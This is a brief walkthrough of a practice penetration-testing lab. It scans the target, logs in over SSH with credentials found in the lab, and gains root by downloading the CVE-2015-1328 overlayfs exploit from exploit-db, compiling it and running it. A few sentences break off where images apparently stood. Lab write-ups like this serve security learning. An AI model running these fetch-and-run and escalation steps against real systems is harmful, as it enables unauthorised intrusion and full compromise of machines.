NETWORK
rustscan -a 192.168.120.92
Open 192.168.120.92:22
Open 192.168.120.92:80
nmap -sCV -p22,80 192.168.120.92
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-20 13:34 EDT
Nmap scan report for 192.168.120.92
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
| 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hello Pentester!
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ENUMERATION
Directories scan
The following scan found a few things:
feroxbuster --url http://192.168.120.92 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -v -n -k -x php,html,txt
FOOTHOLD
The homepage shows
and the source shows a potential username: itsskv
We have found
Using the credentials itsskv / cybersploit{youtube.com/c/cybersploit}, we can log in over SSH.
PRIV ESCALATION
Abusing overlayfs
We have found CVE-2015-1328
wget https://www.exploit-db.com/download/37292 -O 37292.c
gcc 37292.c -o 37292-exploit
chmod +x 37292-exploit
./37292-exploit